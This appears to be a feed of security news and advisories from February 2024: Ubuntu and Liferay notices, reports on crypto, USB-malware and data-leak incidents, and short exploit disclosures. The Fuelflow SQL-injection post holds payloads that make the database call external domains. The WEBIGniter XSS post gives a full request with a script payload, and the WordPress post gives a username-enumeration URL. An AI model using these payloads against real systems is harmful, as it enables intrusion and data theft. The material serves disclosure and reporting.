Ubuntu Security Notice 6584-2 - USN-6584-1 fixed several vulnerabilities in Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. This update provides the corresponding updates for CVE-2021-33912 andCVE-2021-33913 in Ubuntu 16.04 LTS. Philipp Jeitner and Haya Shulman discovered that Libspf2 incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6584-2  
February 21, 2024

libspf2 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Libspf2.

Software Description:  
- libspf2: Sender Policy Framework for SMTP authorization

Details:

USN-6584-1 fixed several vulnerabilities in Ubuntu 18.04 LTS and  
Ubuntu 20.04 LTS. This update provides the corresponding updates for  
CVE-2021-33912 and CVE-2021-33913 in Ubuntu 16.04 LTS.

We apologize for the inconvenience.

Original advisory details:

  Philipp Jeitner and Haya Shulman discovered that Libspf2 incorrectly handled  
  certain inputs. If a user or an automated system were tricked into opening a  
  specially crafted input file, a remote attacker could possibly use this issue  
  to cause a denial of service or execute arbitrary code. (CVE-2021-20314)

  It was discovered that Libspf2 incorrectly handled certain inputs. If a user or  
  an automated system were tricked into opening a specially crafted input file, a  
  remote attacker could possibly use this issue to cause a denial of service or  
  execute arbitrary code. This issue only affected Ubuntu 18.04 LTS and  
  Ubuntu 20.04 LTS. (CVE-2021-33912, CVE-2021-33913)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libmail-spf-xs-perl             1.2.10-6ubuntu0.1~esm2  
   libspf2-2                       1.2.10-6ubuntu0.1~esm2  
   libspf2-dev                     1.2.10-6ubuntu0.1~esm2  
   spfquery                        1.2.10-6ubuntu0.1~esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6584-2  
   https://ubuntu.com/security/notices/USN-6584-1  
   CVE-2021-33912, CVE-2021-33913

Ubuntu Security Notice USN-6584-2

WordPress versions 6.4.3 and below appear to suffer from a REST API related username disclosure vulnerability.

    # Title: wordpress 6.4.3 - Username Disclosure# Author: h4shur# date:2024-02-21# Vendor Homepage: https://www.wordpress.org# Software Link: https://www.wordpress.org/download# Version:  6.4.3 and earlier# Tested on: Windows 10 & Google Chrome# Category : Web Application Bugs### Description :the REST API allows simulating different request types. As such, we canperform a POST request with the “users” string in the body of the request,and tell the REST API to act like it’s received a GET request.You can see the management username in the "slug" feature. And evensecurity plugins like "iThemes Security" do not block this path.### POC :https://target.com/wp-json/?rest_route=/wp/v2/users/# output :[{"id":1,"name":"admin","url":"https:\/\/target.com","description":"","link":"https:\/\/target.com\/?author=1","slug":"admin_1l","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users"}]}}]### Admin Panel :https://target.com/wp-adminhttps://target.com/login.php### contact :h4shursec@gmail.comtwitter.com/h4shurinstagram.com/h4shurt.me/h4shur

WordPress 6.4.3 Username Disclosure

Fuelflow version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: fuelflow-1.0-Copyright-©-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi## Author: nu11secur1ty## Date: 02/21/24## Vendor: https://www.mayurik.com/## Software: https://www.mayurik.com/source-code/P3584/best-petrol-pump-management-software## Reference: https://portswigger.net/web-security/sql-injection## Description:The email parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.tupaputka.com\\xvb'))+'was submitted in the email parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can receive very sensitive informationabout this system by using these vulnerabilities!STATUS: HIGH-Vulnerability[+]Payload:```mysql---Parameter: email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: email=-5782' OR 2852=2852 OR'nYvi'='GjbH&password=h3I!y3o!F9&submit=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''AND (SELECT 9621 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT(ELT(9621=9621,1))),0x7178787671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR'BiVP'='cVHj&password=h3I!y3o!F9&submit=    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+'';SELECTSLEEP(7)#&password=h3I!y3o!F9&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''AND (SELECT 3257 FROM (SELECT(SLEEP(7)))QSTs) OR'Lshu'='MGpY&password=h3I!y3o!F9&submit=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/fuelflow-1.0-Copyright-%C2%A9-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/02/fuelflow-10-copyright-2024-project.html)## Time spent:00:35:00

Fuelflow 1.0 SQL Injection

WEBIGniter version 28.7.23 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)# Exploit Author: Sagar Banwa# Date: 19/10/2023# Vendor: https://webigniter.net/# Software: https://webigniter.net/demo# Reference: https://portswigger.net/web-security/cross-site-scripting# Tested on: Windows 10/Kali Linux# CVE : CVE-2023-46391Stored Cross-site scripting(XSS):Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.Steps-To-Reproduce:1. Login to the Account 2. Go to the Categories.3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.phpRequest POST /cms/categories/add HTTP/2Host: demo.webigniter.netCookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 94Origin: https://demo.webigniter.netReferer: https://demo.webigniter.net/cms/categories/addUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersname=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php

WEBIGniter 28.7.23 Cross Site Scripting

Stored cross-site scripting (XSS) vulnerability in the Document and Media widget in Liferay Portal 7.4.3.18 through 7.4.3.101, and Liferay DXP 2023.Q3 before patch 6, and 7.4 update 18 through 92 allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into a document's “Title” text field.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-47795

**Liferay Portal Document and Media widget and Liferay DXP vulnerable to stored Cross-site Scripting**

Critical severity GitHub Reviewed Published Feb 21, 2024 to the GitHub Advisory Database • Updated Feb 21, 2024

**Package**

maven com.liferay.portal:release.dxp.bom (Maven)

**Affected versions**

\>= 2023.Q3, < 2023.Q3.6

\>= 7.4.13.u18, <= 7.4.13.u92

**Patched versions**

2023.Q3.6

2023.Q3.6

maven com.liferay.portal:release.portal.bom (Maven)

\>= 7.4.3.18, <= 7.4.3.101

**Description**

Published to the GitHub Advisory Database

Feb 21, 2024

Last updated

Feb 21, 2024

GHSA-q2cv-7j58-rfmj: Liferay Portal Document and Media widget and Liferay DXP vulnerable to stored Cross-site Scripting

By Deeba Ahmed
FixedFloat suffered a significant loss of over 1,700 Ethereum and over 400 Bitcoin due to a drainer attack on February 18, 2024.
This is a post from HackRead.com Read the original post: Crypto Exchange FixedFloat Hacked: $26 Million in BTC, ETH Stolen

Another day, another cryptocurrency exchange falls victim to a massive data breach. This time, it’s FixedFloat, a non-KYC Bitcoin and Ethereum crypto exchange targeted in a wallet-drainer attack.

FixedFloat, a decentralized crypto exchange, has been hacked for at least $26 million worth of **Bitcoin and Ethereum**. The attack, initially attributed to minor technical issues, has led to frozen transactions and missing funds.

For your information, FixedFloat is an automated crypto exchange with 26% of its web traffic coming from the US. It integrates with Lightning Network for Bitcoin transactions.

As seen by Hackread.com, users reported frozen transactions and missing funds on the X exchange since February 17, with 409 Bitcoin (Approximately $21 million) and 1,728 Ether tokens (approximately $4.7 million) drained on February 18.

The exchange is investigating the security incident. FixedFloat’s website is also displaying an error message on all pages, stating **“ERROR – Technical work is underway, we will be back soon! If you need to contact us, you can do this via chat.”**

The stolen funds were sent to the Ethereum exchange. Threat researcher going by the X (formerly Twitter) handle of “**Officer’s Notes**” revealed that the hacker first transferred ETH to different ETH addresses and finally moved them to the eXch exchange. They then sent funds to two HitBTC addresses, which received their initial ETH deposits in 2021. This seems to be an attempt to create a false trail.

> . @FixedFloat hacked, resulting in ~1,728 ETH (worth ~$4.85m) and & 409 BTC (worth ~$21m) stolen. The drainer already transferred most of the stolen ETH to eXch on Ethereum. 26M$ loss in total!
> 
> Drainer on Ethereum (1700 ETH stolen): 0x85c4fF99bF0eCb24e02921b0D4b5d336523Fa085… https://t.co/imeXB1h7Jv pic.twitter.com/oquw373NOG
> 
> — Officer's Notes (@officer\_cia) February 19, 2024

“I don’t see any addresses (other than the hacker’s address) that link these 2 HitBTC deposit addresses…Most likely, the hacker created only a false trail,” the researcher **explained** on X (Twitter). This was **confirmed** by the Web3 security platform Cyvers on X as well.

The cryptocurrency exchange confirmed it was an external attack, rubbishing rumours of **insider involvement**. Users and analysts initially claimed FixedFloat developers were behind the hacking, but the exchange denied any internal involvement.

Although the company is yet to reveal the core information on how it happened, cybersecurity researchers are positive that the hack was **caused by vulnerabilities** and insufficient security measures, allowing the attacker to bypass defences and access core service functions.

****Wallet Drainer Attack?****

As to what type of vulnerabilities, researchers believe that it was a wallet drainer attack. A wallet drainer attack is a malicious technique employed by cybercriminals to steal cryptocurrency from unsuspecting victims’ wallets. It typically involves exploiting **vulnerabilities in smart contracts** or tricking users into granting unauthorized access to their funds.

FixedFloat stated that no user funds were affected, but the hack affected 30 outstanding orders, which the exchange will pay as soon as its services resume.

FixedFloat faced criticism for not reporting the hack immediately, while the company maintains it was focusing on minimizing loss and eliminating vulnerabilities. The platform expects full operations to resume soon and release a detailed report after the investigation is complete.

****Surge in Drainer Attacks****

Nevertheless, it is concerning that cryptocurrency exchanges have become a prominent target of scammers lately. Last month Group-IB Global Pvt. Ltd. **disclosed** details of a phishing operation dubbed Inferno Drainer targeting cryptocurrency wallet providers. The scammers targeted over 100 brands and 16,000 malicious domains, stealing over $80 million in digital assets from November 2022 to November 2023. The team reaped $87 million in illicit profits and scammed over 137,000 victims.

In June 2023, Pink Drainer, a notorious hacker group, successfully **executed** a series of high-profile Discord and Twitter hacks targeting projects like Evomos, Pika Protocol, OpenAI CTO, and Orbiter Finance. Online scam detector ScamSniffer confirmed Pink Drainer stole around $3 million from nearly 1,932 victims.

****RELATED ARTICLES****

1.  **Multilingual malware hits Android devices for phishing**
2.  **Scammers Selling Twitter (X) Gold Accounts Fueling Phishing**
3.  **Hacker stole $55M in crypto from DeFi lender bZx via phishing**
4.  **Hackers Aim at Crypto Wallets with Namecheap Phishing Emails**
5.  **Crypt losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed**

Crypto Exchange FixedFloat Hacked: $26 Million in BTC, ETH Stolen

One of our customers found their vibrator was buzzing with a hint of malware.

I know that some of you are expecting a post similar to that about a toothbrush botnet, but this is not a hypothetical case. It actually happened.

A Malwarebytes Premium customer started a thread on Reddit saying we had blocked malware from trying to infect their computer after they connected a vibrator to a USB port in order to charge the device.

The vibrator, Spencer’s Sexology Pussy Power 8-Function Rechargeable Bullet Vibrator, was infected with an information stealer known as Lumma.

Lumma is available through a Malware-as-a-Service (MaaS) model, where cybercriminals pay other cybercriminals for access to malicious software and its related infrastructure. Lumma steals information from cryptocurrency wallets and browser extensions, as well as two-factor authentication details. Lumma is often distributed via email campaigns, but nothing stops the cybercriminals from spreading it through infected USB drives, as is the case here.

The question that remains is, how did the vibrator get infected? The victim bought the vibrator at Spencer’s, so we reached out to the company in an attempt to get to the bottom of this.

Spencer’s acknowledged that it was aware of the problem, but the team investigating the issue was unable to provide further information at this point. We’ll keep you updated if we receive word from them or find out any more information ourselves.

Our advice when it comes to USB devices, including rechargeable vibrators:

*   Don’t connect the USB to your computer for charging. If you use a good old-fashioned AC plug socket then no data transfer can take place while you charge.
*   If you still want the option to connect via USB, USB condoms or “juice-jack defenders” as they are sometimes called will prevent accidental data exchange when your device is plugged into another device with a USB cable.
*   Treat untrusted devices like you would the “lost USB stick” in the parking lot. You know you shouldn’t connect those to your computer, right?
*   Always use security software. In this case, the customer was protected by Malwarebytes Premium. If they weren’t using security software, their personal information might have ended up in the hands of cybercriminals.

**Technical details**

The customer was kind enough to provide us with the content of the flash drive. On it were a host of XML files and a Microsoft Software Installer file (Mia_Khalifa 18+.msi).

The XML files all look very similar to the above and seem to be designed to functions as an XML bomb. An XML bomb is an exponential entity expansion attack, similar to a ZIP bomb, that is designed to crash the web application. This is likely used to draw the attention of the victim away from the actual malware.

The installer creates a program entry called Outweep Dynes.

The Outweep Dynes “program” is yet another installer dropped in %USERPROFILE%\AppData\Local\Outweep Dynes\InstallerPlus_v3e.5m.exe

To hinder reverse engineering, extraction of the executable is password protected. But with the password hardcoded in the file, that was not a problem.

The file then executes a heavily obfuscated portable executable detected by Malwarebytes as Trojan.Crypt.MSIL which is Malwarebytes’ generic detection name for a type of obfuscated Trojan programmed in Microsoft Intermediate Language (MSIL).

The dropped executable is a combination of the Lumma Stealer and an additional .NET dll library.

Malwarebytes ThreatDown customers enjoy protection by Advanced Device Control. When a USB device is connected, ThreatDown now doesn’t just control access—it actively scans it. You can also now choose to block the device until the system scans it. This means threats are stopped in their tracks, well before they can do any harm.

**IOCs**

**Program name:**

Outweep Dynes

**Folder:**

%USERPROFILE%\AppData\Local\Outweep Dynes

**Filenames:**

*   InstallerPlus_v3e.5m.exe
*   Installer-Advanced-Installergenius_v4.8z.1l.exe

**SHA256 hashes:**

*   207ee8fb2a824009fe72a857e041297bde3b82626b8883bc05ca8572b4dd148a
*   e0f4382f4534c2c0071ce0779d21f0fed59f428cdb622b1945e0a54157c19f95
*   be6efe16701cb69ec6e48441a6ad1c1f934e0f92878ccdfafc3f52cbc97be5c2

**Vibrator:**

Spencer’s Sexology Pussy Power 8-Function Rechargeable Bullet Vibrator

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Vibrator virus steals your personal information 

Anne Neuberger, the Biden administration’s deputy national security adviser for cyber, tells WIRED about emerging cybersecurity threats—and what the US plans to do about them.

Anne Neuberger, a Top White House Cyber Official, Sees the 'Promise and Peril' in AI

Data from a Chinese cybersecurity vendor that works for the Chinese government exposed a range of hacking tools and services.

Data from a Chinese cybersecurity vendor that works for the Chinese government has exposed a range of hacking tools and services. Although the source is not entirely clear, it seems that a disgruntled staff member of the group leaked the information on purpose.

The vendor, i-Soon (aka Anxun) is believed to be a private contractor that operates as an Advanced Persistent Threat (APT)\-for-hire, servicing China’s Ministry of Public Security (MPS).

The leaked data is organized in a few groups, such as complaints about the company, chat records, financial information, products, employee information, and details about foreign infiltration. According to the leaked data, i-Soon infiltrated several government departments, including those from India, Thailand, Vietnam, South Korea, and NATO.

Some of the tools that i-Soon used are impressive enough. Some highlights:

*   Twitter (now X) stealer: Features include obtaining the user’s Twitter email and phone number, real-time monitoring, reading personal messages, and publishing tweets on the user’s behalf.
*   Custom Remote Access Trojans (RATs) for Windows x64/x86: Features include process/service/registry management, remote shell, keylogging, file access logging, obtaining system information, disconnecting remotely, and uninstallation.
*   The iOS version of the RAT also claims to authorize and support all iOS device versions without jailbreaking, with features ranging from hardware information, GPS data, contacts, media files, and real-time audio records as an extension. (Note: this part dates back to 2020)
*   The Android version can dump messages from all popular Chinese chatting apps QQ, WeChat, Telegram, and MoMo and is capable of elevating the system app for persistence against internal recovery.
*   Portable devices for attacking networks from the inside.
*   Special equipment for operatives working abroad to establish safe communication.
*   User lookup database which lists user data including phone number, name, and email, and can be correlated with social media accounts.
*   Targeted automatic penetration testing scenario framework.

While some of the information is dated, the leaked data provide an inside look in the operations that go on in a leading spyware vendor and APT-for-hire.

It will certainly rattle some cages at the infiltrated entities and as such it could possibly cause a shift in international diplomacy and expose the holes in the national security of several countries.

Not all of the material has been examined yet. There is a lot available and translating is not an easy task. But we will keep you posted if anything else of interest shows up.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 A first analysis of the i-Soon data leak 

By Deeba Ahmed
Personal Information of 200,000+ Exposed in Philippine School Voucher Program Portal Data Leak.
This is a post from HackRead.com Read the original post: Unsecured Database Leaks 153 GB of Filipino Student and Family Data

Another day, another misconfigured database jeopardizes the online privacy and physical security of hundreds of thousands of children and families.

Cybersecurity researcher Jeremiah Fowler discovered a non-password-protected database containing over 200,000 records, including personally identifiable information (PII) of students and parents. 

According to Fowler’s findings, detailed in a blog post for VPNMentor, there were over 210,020 records or 153.76 GB of data in the unprotected database. It was associated with the Online Voucher Application (OVAP) created by the Department of Education and the Private Education Assistance Committee.

Fowler uncovered a vast collection of sensitive records, including children’s and family members’ full names, DOBs, home addresses, phone numbers, tax records, as well as unredacted images of children. 

The database also contained official documents such as tax filings, voucher applications, guardian/parent consent forms, financial assistance, employee certificates, local government certificates, and death certificates, which also hold personal data. For instance, tax records typically contain full names, addresses, phone numbers, employers, and tax identification numbers. A concerning aspect of the breach is that the application folders contained child profile photos.

A sample of what data was exposed (Credit: VPNmentor)

The National Privacy Commission (NPC) of the Philippines has since secured the database and is investigating the matter further. It is unclear who owns and manages the database, how long the records were exposed, or if anyone else may have gained access.

The Philippines’ Department of Education created the OVAP platform for eligible students seeking financial aid, allowing them to apply for vouchers for Senior High School education. However, the platform’s lack of password protection raises potential security concerns.

The full details of exposed data can be viewed **here**. However, the data leak has potentially exposed students and parents to a wide range of **online threats**. Students’ families submit tax filings and income declarations during application processes, which may expose sensitive financial information, potentially exposing them to financial fraud, **phishing attempts**, or identity theft.

Additionally, this could lead to monetary loss for students and their families. Additionally, PII, including children/minors’ data, can be compromised, posing a lifelong risk to their privacy and digital identities.

Governments and relevant departments must prioritize strong cybersecurity measures and protect the sensitive data of their citizens when creating such portals. Regular risk assessments and security audits are needed to secure public data and prevent unauthorized actors from accessing it.

1.  **Cigna Health Data Leak: 17 Billion Records Exposed**
2.  **7TB of Healthcare Data Leak Affects 12 Million Patients**
3.  **Researcher Exposes Crypto Scam Network of 300 Domains**
4.  **Database Leak Exposes 500K Irish Police Vehicle Seizure Records**
5.  **Data Leak Exposes 1.5B Real Estate Records, Including Kylie Jenner**

Tag

#auth